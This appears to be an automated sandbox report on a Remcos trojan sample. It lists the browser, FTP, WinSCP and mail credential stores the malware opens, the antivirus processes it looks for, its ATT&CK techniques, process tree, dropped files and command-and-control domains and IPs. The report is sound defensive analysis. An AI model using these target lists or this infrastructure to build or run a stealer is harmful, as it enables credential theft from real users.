                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFF1C.tmp VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFF2C.tmp VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF920C GetLocalTime,0_2_02CF920C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,13_2_006E8550
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFB78C GetVersionExA,0_2_02CFB78C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

MITRE ATT&CK Matrix (techniques grouped by tactic column, top to bottom; a leading number is the badge value shown in that matrix cell)

Reconnaissance
• Gather Victim Identity Information
• Credentials
• Email Addresses
• Employee Names
• Gather Victim Network Information
• Domain Properties
• DNS
• Network Trust Dependencies
• Network Topology
• IP Addresses
• Network Security Appliances
• Gather Victim Org Information

Resource Development
• Acquire Infrastructure
• Domains
• DNS Server
• Virtual Private Server
• Server
• Botnet
• Web Services
• Serverless
• Malvertising
• Compromise Infrastructure
• Domains
• DNS Server

Initial Access
• 1 Valid Accounts
• Default Accounts
• Domain Accounts
• Local Accounts
• Cloud Accounts
• Replication Through Removable Media
• External Remote Services
• Drive-by Compromise
• Exploit Public-Facing Application
• Supply Chain Compromise
• Compromise Software Dependencies and Development Tools
• Compromise Software Supply Chain

Execution
• 121 Windows Management Instrumentation
• 11 Native API
• 1 Shared Modules
• 3 Command and Scripting Interpreter
• 1 Scheduled Task/Job
• 2 Service Execution
• Systemd Timers
• Container Orchestration Job
• Command and Scripting Interpreter
• PowerShell
• AppleScript
• Windows Command Shell

Persistence
• 2 LSASS Driver
• 1 DLL Side-Loading
• 1 Valid Accounts
• 1 Windows Service
• 1 Scheduled Task/Job
• 21 Registry Run Keys / Startup Folder
• Startup Items
• Scheduled Task/Job
• At
• Cron
• Launchd
• Scheduled Task

Privilege Escalation
• 2 LSASS Driver
• 1 DLL Side-Loading
• 1 Valid Accounts
• 1 Access Token Manipulation
• 1 Windows Service
• 311 Process Injection
• 1 Scheduled Task/Job
• 21 Registry Run Keys / Startup Folder
• At
• Cron
• Launchd
• Scheduled Task

Defense Evasion
• 21 Disable or Modify Tools
• 11 Deobfuscate/Decode Files or Information
• 4 Obfuscated Files or Information
• 11 Software Packing
• 1 Timestomp
• 1 DLL Side-Loading
• 1 File Deletion
• 432 Masquerading
• 1 Valid Accounts
• 1 Access Token Manipulation
• 151 Virtualization/Sandbox Evasion
• 311 Process Injection

Credential Access
• 2 OS Credential Dumping
• 21 Input Capture
• 1 Credentials in Registry
• NTDS
• LSA Secrets
• Cached Domain Credentials
• DCSync
• Proc Filesystem
• /etc/passwd and /etc/shadow
• Network Sniffing
• Input Capture
• Keylogging

Discovery
• 1 System Time Discovery
• 1 Account Discovery
• 1 System Network Connections Discovery
• 3 File and Directory Discovery
• 47 System Information Discovery
• 1 Query Registry
• 261 Security Software Discovery
• 151 Virtualization/Sandbox Evasion
• 2 Process Discovery
• 1 Application Window Discovery
• 1 System Owner/User Discovery
• 1 System Network Configuration Discovery

Lateral Movement
• 1 Taint Shared Content
• Remote Desktop Protocol
• SMB/Windows Admin Shares
• Distributed Component Object Model
• SSH
• VNC
• Windows Remote Management
• Cloud Services
• Direct Cloud VM Connections
• Shared Webroot
• Software Deployment Tools
• Taint Shared Content

Collection
• 11 Archive Collected Data
• 2 Data from Local System
• 1 Email Collection
• 21 Input Capture
• 1 Clipboard Data
• GUI Input Capture
• Web Portal Capture
• Credential API Hooking
• Data Staged
• Local Data Staging
• Remote Data Staging
• Screen Capture

Command and Control
• 3 Ingress Tool Transfer
• 11 Encrypted Channel
• 1 Non-Standard Port
• 4 Non-Application Layer Protocol
• 125 Application Layer Protocol
• Multiband Communication
• Commonly Used Port
• Application Layer Protocol
• Web Protocols
• File Transfer Protocols
• Mail Protocols
• DNS

Exfiltration
• Exfiltration Over Other Network Medium
• Exfiltration Over Bluetooth
• Automated Exfiltration
• Traffic Duplication
• Scheduled Transfer
• Data Transfer Size Limits
• Exfiltration Over C2 Channel
• Exfiltration Over Alternative Protocol
• Exfiltration Over Symmetric Encrypted Non-C2 Protocol
• Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
• Exfiltration Over Unencrypted Non-C2 Protocol
• Exfiltration Over Physical Medium

Impact
• Abuse Accessibility Features
• Network Denial of Service
• Data Encrypted for Impact
• Data Destruction
• Data Encrypted for Impact
• Service Stop
• Inhibit System Recovery
• Defacement
• Internal Defacement
• External Defacement
• Firmware Corruption
• Resource Hijacking
Behavior Graph ID: 1562865; Sample: C6dAUcOA6M.exe; Start date: 26/11/2024; Architecture: WINDOWS; Score: 100

Start (node 2)
• DNS/IP: zlenh.biz; zjbpaao.biz; 61 other IPs or domains
• Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 18 other signatures
• Started: alg.exe (10); C6dAUcOA6M.exe (15); Juqmtmya.PIF (17); 7 other processes (19)

alg.exe (10)
• DNS/IP: lpuegx.biz 82.112.184.197, ports 49814, 49867, 49871 (FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation); qpnczch.biz 18.246.231.120, ports 50055, 50065, 50077 (AMAZON-02US, United States); 12 other IPs or domains
• Dropped: C:\Program Files\...\updater.exe (PE32+); C:\Program Files\...\private_browsing.exe (PE32+); C:\Program Files\...\plugin-container.exe (PE32+); 125 other malicious files
• Signatures: Creates files in the system32 config directory; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

C6dAUcOA6M.exe (15)
• DNS/IP: gxe0.com 198.252.105.91, ports 443, 49707, 49708 (HAWKHOSTCA, Canada)
• Dropped: C:\Users\Public\Libraries\aymtmquJ.pif (PE32); C:\Users\Public\Libraries\aymtmquJ.cmd (DOS); C:\Users\Public\Libraries\Juqmtmya (data); C:\Users\Public\Juqmtmya.url (MS)
• Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
• Started: aymtmquJ.pif (21); cmd.exe (25); esentutl.exe (27)

Juqmtmya.PIF (17)
• Signatures: Sample uses process hollowing technique
• Started: aymtmquJ.pif (29)

7 other processes (19)
• Started: aymtmquJ.pif (31)

aymtmquJ.pif (21)
• Dropped: C:\Users\user\AppData\...\Trading_AIBot.exe (PE32); C:\Users\user\...\Native_neworigin.exe (PE32); C:\Program Files (x86)\...\armsvc.exe (PE32)
• Signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
• Started: Native_neworigin.exe (33); Trading_AIBot.exe (38)

cmd.exe (25)
• Started: esentutl.exe (40); 8 other processes (52)

esentutl.exe (27)
• Dropped: C:\Users\Public\Libraries\Juqmtmya.PIF (PE32)
• Started: conhost.exe (42)

aymtmquJ.pif (29)
• Started: Native_neworigin.exe (44); Trading_AIBot.exe (46)

aymtmquJ.pif (31)
• Started: Native_neworigin.exe (48); Trading_AIBot.exe (50)

Native_neworigin.exe (33)
• DNS/IP: s82.gocheapweb.com 51.195.88.199, ports 49774, 49845, 49866 (OVHFR, France); acwjcqqv.biz 18.141.10.107, ports 49757, 49764, 49790 (AMAZON-02US, United States); 4 other IPs or domains
• Dropped: C:\Windows\System32\alg.exe (PE32+); C:\Windows\System32\FXSSVC.exe (PE32+); DiagnosticsHub.Sta...llector.Service.exe (PE32+); 3 other malicious files
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Infects executable files (exe, dll, sys, html)

Trading_AIBot.exe (38)
• Dropped: C:\Users\user\AppData\Roaming\...\apihost.exe (PE32)
• Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Drops large PE files; Adds a directory exclusion to Windows Defender
• Started: powershell.exe (54); schtasks.exe (57); apihost.exe (59)

esentutl.exe (40)
• Dropped: C:\Users\Public\alpha.pif (PE32)
• Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Native_neworigin.exe (44)
• Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook

8 other processes (52)
• Dropped: C:\Users\Public\xpha.pif (PE32)
• Started: xpha.pif (61)

powershell.exe (54)
• Signatures: Loading BitLocker PowerShell Module
• Started: conhost.exe (64); WmiPrvSE.exe (66)

schtasks.exe (57)
• Started: conhost.exe (68)

xpha.pif (61)
• DNS/IP: 127.0.0.1 (unknown, unknown)

Source | Detection | Scanner | Label
C6dAUcOA6M.exe | 63% | ReversingLabs | Win32.Trojan.Remcos
C6dAUcOA6M.exe | 62% | Virustotal |
C6dAUcOA6M.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
